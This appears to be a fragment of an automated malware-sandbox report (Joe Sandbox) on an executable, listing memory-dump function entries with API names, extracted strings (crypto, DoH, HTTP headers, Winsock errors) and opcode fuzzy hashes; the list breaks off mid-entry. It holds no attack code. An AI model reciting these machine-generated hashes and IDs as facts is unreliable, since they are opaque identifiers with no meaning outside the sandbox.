                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_lfputs
                            • String ID: #$%*s$-=O=-
                            • API String ID: 2972761690-742414071
                            • Opcode ID: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
                            • Instruction ID: f8be1c7479bda036809198a4e663d1aa3b07a0a01d7ebb29e4540d59a5cbabcd
                            • Opcode Fuzzy Hash: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
                            • Instruction Fuzzy Hash: BE41F2327291818BEB9CDB28E984768B7A1F748744F905235EB5983FD8DB3CE524CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Crypt$Hash$Param$ContextDestroyRelease
                            • String ID:
                            • API String ID: 2110207923-3916222277
                            • Opcode ID: 91e91ab008b767c8f05ef04f45e93c4004cb4d75842f0d656781fabd1f371227
                            • Instruction ID: ea60fb131ac11ad809949360f6e7be17fe44c6f44ec808ca9ebbf0538ac4dc70
                            • Opcode Fuzzy Hash: 91e91ab008b767c8f05ef04f45e93c4004cb4d75842f0d656781fabd1f371227
                            • Instruction Fuzzy Hash: 0901BC36A1564082EB18EF60D454378B370FB84F9AF848831DA1D02698CFBCD944C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3822340588-0
                            • Opcode ID: 49c6dfc2acd4c87636d5ca94b473e4b984134c6ac036ba5c13ff0e5f5ffd9ce1
                            • Instruction ID: cb5e942b662a412f24da8968ab7ece3e4de857e8810aa4f97f9e8061ae8b4d7d
                            • Opcode Fuzzy Hash: 49c6dfc2acd4c87636d5ca94b473e4b984134c6ac036ba5c13ff0e5f5ffd9ce1
                            • Instruction Fuzzy Hash: 6511C62570C64251EB24BB25E488379A3B1BF88BA1FC44334C97D02AD5CFBCE1448790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Crypt$Context$AcquireCreateHashRelease
                            • String ID: @
                            • API String ID: 4045725610-2766056989
                            • Opcode ID: 24fa187fc953c2109e7e0e3cc39247c607dc63ec20b91a2c3c8db8bc80e0a134
                            • Instruction ID: 076ecc35d799f04f4c993a00600894b248f8a3849db2a5e9daa07b2c669f0ed1
                            • Opcode Fuzzy Hash: 24fa187fc953c2109e7e0e3cc39247c607dc63ec20b91a2c3c8db8bc80e0a134
                            • Instruction Fuzzy Hash: 9CF0E921B1891282F7749B31E800B36A370EB94B46F84C030CA5D876C8DFBCE0469B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Crypt$Hash$Param$ContextDestroyRelease
                            • String ID:
                            • API String ID: 2110207923-0
                            • Opcode ID: 7780f7c2c0372b06f82a33d2c26906732b6f38dfd8a46c9ad699e4595bf9f30a
                            • Instruction ID: 7b2f79faee9175c41fd660d6fd1be3aa6200e9fe15a2ddc5124a828192f23095
                            • Opcode Fuzzy Hash: 7780f7c2c0372b06f82a33d2c26906732b6f38dfd8a46c9ad699e4595bf9f30a
                            • Instruction Fuzzy Hash: 8C017C3661564086EB18DF21D448379B731FB84F96F948831DA1D03698CFBCD948C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Crypt$AcquireContextCreateHash
                            • String ID: @
                            • API String ID: 1914063823-2766056989
                            • Opcode ID: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
                            • Instruction ID: 85cbaad3c25994835483bc4bf1f5fedf3c6c9eb0e3c0056c9c18c859f1a63950
                            • Opcode Fuzzy Hash: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
                            • Instruction Fuzzy Hash: 6DE0D861B2455283F7709B71E801F16A3A0EB88749F848030CE4C4BA54DF7CC1868B64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 84b6eab3dac30dd0c7db40f185ccc60bab2d407ff4ed9a95af4507aa3cac41ab
                            • Instruction ID: ddfa0557aa4de27255ed94e54a99225e012597cee7e28278da768f4131ac5f34
                            • Opcode Fuzzy Hash: 84b6eab3dac30dd0c7db40f185ccc60bab2d407ff4ed9a95af4507aa3cac41ab
                            • Instruction Fuzzy Hash: 4F017C26B0469182E304DF26E88052ABBB0FB88FC0B998031CB5C43758CFB8E5468750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_func
                            • String ID: Failed to encode DoH packet [%d]
                            • API String ID: 711238415-614724559
                            • Opcode ID: 0132bdc6058aed386cc33b4a69fc5ad1fc74a49b7418f19ef67d7fa31cecbfb3
                            • Instruction ID: 1c91f5f2dd9769cac5ef99280211450329e2dd006231ecb973e5b1cb78f6dbb7
                            • Opcode Fuzzy Hash: 0132bdc6058aed386cc33b4a69fc5ad1fc74a49b7418f19ef67d7fa31cecbfb3
                            • Instruction Fuzzy Hash: 30827426B0868592EB08FB25D5403BCA3B4FB45B85F848435CA6E177D5CFBDE461C3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
                            • API String ID: 0-1157147699
                            • Opcode ID: 3b797f3d02f1237fb1534b4b50888a7c942f9ac6f5f18a1c31b4eb0cf25eeb41
                            • Instruction ID: 66cefbe919cedcc1c5761461eee0e3a8f3c775fe825ccf56599ff6e490e35acb
                            • Opcode Fuzzy Hash: 3b797f3d02f1237fb1534b4b50888a7c942f9ac6f5f18a1c31b4eb0cf25eeb41
                            • Instruction Fuzzy Hash: 25219125A09B8691EF19EB1A94441B4A7B0AF45F88F884035CE6F07BD5DFBCE446C3A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1DE9BD0: CryptAcquireContextA.ADVAPI32 ref: 00007FF7F1DE9BEC
                              • Part of subcall function 00007FF7F1DE9BD0: CryptCreateHash.ADVAPI32 ref: 00007FF7F1DE9C0D
                            • CryptHashData.ADVAPI32(?,00007FF7F1DC795A), ref: 00007FF7F1DE9CDE
                              • Part of subcall function 00007FF7F1DE9C20: CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE9C49
                              • Part of subcall function 00007FF7F1DE9C20: CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE9C6C
                              • Part of subcall function 00007FF7F1DE9C20: CryptDestroyHash.ADVAPI32 ref: 00007FF7F1DE9C7B
                              • Part of subcall function 00007FF7F1DE9C20: CryptReleaseContext.ADVAPI32 ref: 00007FF7F1DE9C8B
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                            • String ID:
                            • API String ID: 3606780921-0
                            • Opcode ID: 33903e9631ea68ba9b79ee1d2b37164bd7a9b8be6849851d7280006c9cb37690
                            • Instruction ID: 1fa71f9d409b938da682cd511e91a3e6b36b345f7cb4ea9b290844197d4fa9d3
                            • Opcode Fuzzy Hash: 33903e9631ea68ba9b79ee1d2b37164bd7a9b8be6849851d7280006c9cb37690
                            • Instruction Fuzzy Hash: 90F0C86270864642FB24B716B4A157AA3A0BB8CBC9F844031FE9D4BB89DF6CD5118B41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f0756801c119c3ca93350c31e5009191f05ee7f902fb0d32e5593b0c32e4de4
                            • Instruction ID: 3793a79ddd6b85d5e6f47ed38bd4a3b5180496fde02f098db434931f702271de
                            • Opcode Fuzzy Hash: 5f0756801c119c3ca93350c31e5009191f05ee7f902fb0d32e5593b0c32e4de4
                            • Instruction Fuzzy Hash: 6A31633180954599E39BE63C4228639E2B69F41B04FBC8732D11B324D4FFBD74C2A5A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 22bd18be722e122f8150024359f21294a4f6716354f23e3615689319c545e64f
                            • Instruction ID: e082b58a5565893149e7652097f30f7c14c46c7b7a8e9f87ef30b1fc595e0c35
                            • Opcode Fuzzy Hash: 22bd18be722e122f8150024359f21294a4f6716354f23e3615689319c545e64f
                            • Instruction Fuzzy Hash: 6BA02431705C05C0D3104700F150F105730F7C4705740C430C41C45414CF74C101D300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5a495843244666959e901a4133de7526445879ec1bc81ae1c5531b20c7eb1d85
                            • Instruction ID: 0f945f4ed300d58e356efbac75c1384d4cf88724aadaebab088585e6251ad7b7
                            • Opcode Fuzzy Hash: 5a495843244666959e901a4133de7526445879ec1bc81ae1c5531b20c7eb1d85
                            • Instruction Fuzzy Hash: 96A00121949C16D5EB58AB00A850021A630AB90303FC08031E02E414E09FECA444D3B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: b97e90704252db1c4e0597ed25d571f5cbd5bb8b77ae79f981928d8bcf10b950
                            • Instruction ID: 78063d8708138ba7ee8ab5b5a4f13afcf6eb7b3c322aebd327514c9f463f593a
                            • Opcode Fuzzy Hash: b97e90704252db1c4e0597ed25d571f5cbd5bb8b77ae79f981928d8bcf10b950
                            • Instruction Fuzzy Hash: 5802E836655B81AAD78DAF21E5942A8B374FB88B41F444835CF6E43359EFB8B074C350
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncmp$strcmpstrncpystrtol
                            • String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$SCH_USE_STRONG_CRYPTO$USE_STRONG_CRYPTO
                            • API String ID: 1196261436-2313236003
                            • Opcode ID: f2ba9ea898179d6e34b5565672f2f0a0001876c9ab92d7e0bb575b63a63dcc25
                            • Instruction ID: 1d2c960d0ea153e74f41cffc1c370a3bcec48a5ffde75ea5e860818a8c8f460c
                            • Opcode Fuzzy Hash: f2ba9ea898179d6e34b5565672f2f0a0001876c9ab92d7e0bb575b63a63dcc25
                            • Instruction Fuzzy Hash: 50216D21B18B1281FB65AB269840265F7B4EF45BC1F885039CE6E437C4DFBCE45297A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncpy
                            • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                            • API String ID: 3301158039-3442644082
                            • Opcode ID: 55802d273112204894275d8ff223f6ce31bde9b4dd83ab5ea1dde2c5f824306a
                            • Instruction ID: 9847b23f23ec20e8574878376e91707ff7469822507362356011e378a7c0018c
                            • Opcode Fuzzy Hash: 55802d273112204894275d8ff223f6ce31bde9b4dd83ab5ea1dde2c5f824306a
                            • Instruction Fuzzy Hash: 40B1C662D0C50391FBADFB2894A81749771AF81381FD59135C02E05AEAAFDEA944F3F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strcmp$_errno_time64
                            • String ID: 127.0.0.1$Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$HTTP/1.0 connection set to keep alive$HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Illegal STS header skipped$Invalid Content-Length: value$Last-Modified:$Location:$Maximum file size exceeded$Negotiate: noauthpersist -> %d, header part: %s$Overflow Content-Length: value$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$Retry-After:$Set-Cookie:$Strict-Transport-Security:$Transfer-Encoding:$WWW-Authenticate:$[::1]$close$false$keep-alive$localhost
                            • API String ID: 1495474129-986724021
                            • Opcode ID: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
                            • Instruction ID: 986923f03d007a21d685e9b58be942b7531e91e368fc6dcc881137395c872a32
                            • Opcode Fuzzy Hash: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
                            • Instruction Fuzzy Hash: 76229F21B0D68255FB28FB21A5502B8A7B2AF45780FC44835DA7E076C6EFBCE505C7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$strncpy
                            • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                            • API String ID: 3653662010-131313631
                            • Opcode ID: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
                            • Instruction ID: 47e9cfc13d3413ae0c56f619bc673d3f1d39109f3e68368c72a517d2d080b253
                            • Opcode Fuzzy Hash: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
                            • Instruction Fuzzy Hash: B7516C2290C65286E768FB24A4046B8E374EF84781FC54036D5AE427D6CFFCE945D3E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
